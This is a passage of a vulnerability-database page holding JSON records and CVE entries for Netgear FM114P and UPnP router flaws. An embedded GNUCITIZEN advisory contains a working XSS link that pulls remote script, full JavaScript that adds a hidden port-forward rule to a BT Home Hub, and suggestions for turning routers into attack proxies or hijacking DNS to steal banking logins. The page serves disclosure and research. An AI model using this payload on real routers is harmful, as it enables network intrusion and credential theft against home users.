routers. The exploit has been tested on BT Home Hub -\nFirmware version 6.2.6.B. Just to make things clear, UPnP is enabled\nby default on the BT Home Hub, just like most IGDs. If your Internet\ngateway is a BT Home Hub, clicking on the following link should add a\nnew forward rule called EVILFORWARDRULE: ATTACK\n\u003chttp://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e\n\nIn order to check if the port-forwarding rule was added successfully\nyou can use UPnP Port Forwarding Utility [5] and simply click on\n\"Update list now\" after the device has been discovered (device name\nshould show on the top-left corner a few seconds later after launching\nthe tool). You could of course use the technique and code explained in\nthis post on any Internet gateway that supports UPnP and is a\nvulnerable to a preauth XSS vulnerability. If you manage to\nsuccessfully test this attack on the BT Home Hub or any other device\nplease let us know!\n\n\n** Zombie routers and the unvalidated NewInternalClient bug **\n\nA bit of more UPnP hacking lead me to realize that the BT Home Hub is\nvulnerable to the (in)famous unvalidated NewInternalClient bug. This\nbug allows you to choose external IP addresses instead of a LAN IP\naddresses as intended when setting up port-forwarding rules via UPnP. \nIn this case, I reused the previous code and changed the internal IP\naddress (192.168.1.64) in the NewInternalClient tag with the IP\naddress of a random Internet web server and the value of the\nNewInternalPort tag to 80. This effectively allows an attacker to use\nthe vulnerable BT Home Hub router as a proxy - aka onion router. In\nother words, when probing the router\u0027s NATed IP address on port 1337,\nthe attacker is effectively probing the IP address and port number\nspecified by the port-forwarding rule - except the routers IP address\nwould be shown in logs of the target web server, as opposed to the\nattacker\u0027s real IP address. I thought this is a nice real example of\nhow a vulnerable router can be used as a zombie by simply having a\nuser visit a page with malicious scripting (XSS + UPnP SOAP request). \nImagine running your favourite vulnerability scanner against a target\nsite, while using the victim user\u0027s router as a proxy - sweet!\n\nThere are other UPnP functionalities besides port forwarding rules\nthat look potentially interesting from a hacking point of view. For\ninstance, SetDNSServer [6] allows you to guess what, set the gateway\u0027s\nDNS server. Imagine someone changing your router\u0027s DNS server setting\nby simply visiting a webpage. After that you visit\nyourfavoritebank.com and guess what, you\u0027re actually visiting a\nmalicious server that is harvesting all your banking login details!\nI\u0027ll leave the exercise of writing a remote UPnP exploit that changes\nthe DNS server setting on the BT Home Hub (or any other vulnerable\nrouter) to the reader. \n\n\n** About GNUCITIZEN **\n\nGNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think\nTank, which primarily deals with all aspects of the art of hacking. \nOur work has been featured in established magazines and information\nportals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and\nmany others. The members of the GNUCITIZEN group are well known and\nwell established experts in the Information Security, Black Public\nRelations (PR) Industries and Hacker Circles with widely recognized\nexperience in the government and corporate sectors and the open source\ncommunity. \n\nGNUCITIZEN is an ethical, white-hat organization that doesn\u0027t hide\nanything. We strongly believe that knowledge belongs to everyone and\nwe make everything to ensure that our readers have access to the\nlatest cutting-edge research and get alerted of the newest security\nthreats when they come. Our experience shows that the best way of\nprotection is the mass information. And we mean that literally!!! It\nis in the public\u0027s best interest to make our findings accessible to\nvast majority of people, simply because it is proven that the more\npeople know about a certain problem, the better. \n\n\n[1] http://www.upnp.org/resources/whitepapers.asp\n[2] http://www.securityfocus.com/bid/7267/discuss\n[3] http://www.w3.org/TR/XMLHttpRequest/\n[4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4\n[5] http://www.codeproject.com/KB/IP/PortForward.aspx\n[6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)\n\n\n\n// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\nvar req;\nvar url=\"/upnp/control/igd/wanpppcInternet\";\n\nfunction loadXMLDoc(url) {\n\treq = false;\n // branch for native XMLHttpRequest object\n if(window.XMLHttpRequest \u0026\u0026 !(window.ActiveXObject)) {\n \ttry {\n\t\t\treq = new XMLHttpRequest();\n } catch(e) {\n\t\t\treq = false;\n }\n // branch for IE/Windows ActiveX version\n } else if(window.ActiveXObject) {\n \ttry {\n \treq = new ActiveXObject(\"Msxml2.XMLHTTP\");\n \t} catch(e) {\n \ttry {\n \t\treq = new ActiveXObject(\"Microsoft.XMLHTTP\");\n \t} catch(e) {\n \t\treq = false;\n \t}\n\t\t}\n }\n\tif(req) {\n\t\treq.onreadystatechange = processReqChange;\n\t\treq.open(\"POST\", url, true);\n\t\treq.setRequestHeader(\u0027SOAPAction\u0027,\n\u0027\"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping\"\u0027);\n\n\t\treq.send(\u0027\u003c?xml version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\nSOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\u003cm:AddPortMapping\nxmlns:m=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\u003cNewRemoteHost\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e\u003c/NewRemoteHost\u003e\u003cNewExternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e1337\u003c/NewExternalPort\u003e\u003cNewProtocol\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e445\u003c/NewInternalPort\u003e\u003cNewInternalClient\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e192.168.1.64\u003c/NewInternalClient\u003e\u003cNewEnabled\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"boolean\"\u003e1\u003c/NewEnabled\u003e\u003cNewPortMappingDescription\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eEVILFORWARDRULE\u003c/NewPortMappingDescription\u003e\u003cNewLeaseDuration\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui4\"\u003e0\u003c/NewLeaseDuration\u003e\u003c/m:AddPortMapping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027);\n\t}\n}\n\nfunction processReqChange() {\n // only if req shows \"loaded\"\n if (req.readyState == 4) {\n // only if \"OK\"\n if (req.status == 200) {\n // ...processing statements go here... \n\t\t//alert(req.responseText);\n } else {\n alert(\"There was a problem retrieving the XML data:\\n\" +\nreq.statusText);\n }\n }\n}\n\n\nloadXMLDoc(url);\n\n-- \npagvac\ngnucitizen.org, ikwt.com\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "7267",
"trust": 1.0
},
{
"db": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "62502",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"id": "VAR-200304-0138",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"last_update_date": "2022-05-17T22:39:13.925000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=104940655818917\u0026w=2"
},
{
"trust": 0.3,
"url": "/archive/1/317353"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/xmlhttprequest/"
},
{
"trust": 0.1,
"url": "http://www-adele.imag.fr/users/didier.donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/lanhostconfigmanagementmodel.html#setdnsserver(java.lang.string)"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss"
},
{
"trust": 0.1,
"url": "http://www.upnp.org/resources/whitepapers.asp"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4"
},
{
"trust": 0.1,
"url": "http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/7267/discuss"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5"
},
{
"trust": 0.1,
"url": "http://www.codeproject.com/kb/ip/portforward.aspx"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003csoap-env:body\u003e\u003cm:addportmapping"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
},
{
"date": "2008-01-10T22:57:43",
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Configuration Error",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
}
}
VAR-200304-0139
Vulnerability from variot - Updated: 2022-05-17 02:06Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router uses a port blocking rule vulnerability when using the UPnP feature, which can be exploited by remote attackers to bypass restricted access to restricted ports. Netgear FM114P allows blocking of some ports, restricting external users from accessing the internal network or restricting internal users from connecting to the WAN. If remote access and UPnP functions are enabled in the device, remote users can submit UPnP SOAP request connections to bypass rule access restrictions. port,
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200304-0139",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fwag114 1.0.26rc4",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"db": "BID",
"id": "7270"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Bj\u00f6rn Stickler \u003cstickler@rbg.informatik.tu-darmstadt.de\u003e.",
"sources": [
{
"db": "BID",
"id": "7270"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2003-0957",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-0957",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router uses a port blocking rule vulnerability when using the UPnP feature, which can be exploited by remote attackers to bypass restricted access to restricted ports. Netgear FM114P allows blocking of some ports, restricting external users from accessing the internal network or restricting internal users from connecting to the WAN. If remote access and UPnP functions are enabled in the device, remote users can submit UPnP SOAP request connections to bypass rule access restrictions. port,",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"db": "BID",
"id": "7270"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "7270",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2003-0957",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"db": "BID",
"id": "7270"
}
]
},
"id": "VAR-200304-0139",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
}
]
},
"last_update_date": "2022-05-17T02:06:53.627000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=104940758020372\u0026w=2"
},
{
"trust": 0.3,
"url": "/archive/1/317358"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"db": "BID",
"id": "7270"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"db": "BID",
"id": "7270"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7270"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0957"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7270"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "7270"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe Wireless Router Rules Can Be Vulnerable",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0957"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Configuration Error",
"sources": [
{
"db": "BID",
"id": "7270"
}
],
"trust": 0.3
}
}
CVE-2002-2354 (GCVE-0-2002-2354)
Vulnerability from cvelistv5 – Published: 2007-10-29 19:00 – Updated: 2024-09-16 19:56
VLAI?
Summary
Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.934Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5940"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5940"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2354",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Netgear FM114P firmware 1.3 wireless firewall allows remote attackers to cause a denial of service (crash or hang) via a large number of TCP connection requests."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netgear-fm114p-tcp-dos(10340)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10340.php"
},
{
"name": "20021010 TCP flood against NetGear FM114P",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/294702"
},
{
"name": "5940",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5940"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2354",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-16T19:56:19.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2355 (GCVE-0-2002-2355)
Vulnerability from cvelistv5 – Published: 2007-10-29 19:00 – Updated: 2024-09-17 02:36
VLAI?
Summary
Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T03:59:11.776Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "5943",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/294740"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-10-29T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "5943",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/294740"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2355",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Netgear FM114P firmware 1.3 wireless firewall, when configured to backup configuration information, stores DDNS (DynDNS) user name and password, MAC address filtering table and possibly other information in cleartext, which could allow local users to obtain sensitive information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "5943",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/5943"
},
{
"name": "netgear-fm114p-plaintext-ddns(10341)",
"refsource": "XF",
"url": "http://www.iss.net/security_center/static/10341.php"
},
{
"name": "20021010 Plain text DDNS password in NetGear FM114P backups",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/294740"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2355",
"datePublished": "2007-10-29T19:00:00Z",
"dateReserved": "2007-10-29T00:00:00Z",
"dateUpdated": "2024-09-17T02:36:17.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2003-1427 (GCVE-0-2003-1427)
Vulnerability from cvelistv5 – Published: 2007-10-20 10:00 – Updated: 2024-08-08 02:28
VLAI?
Summary
Directory traversal vulnerability in the web configuration interface in Netgear FM114P 1.4 allows remote attackers to read arbitrary files, such as the netgear.cfg configuration file, via a hex-encoded (%2e%2e%2f) ../ (dot dot slash) in the port parameter.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:28:02.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "6807",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
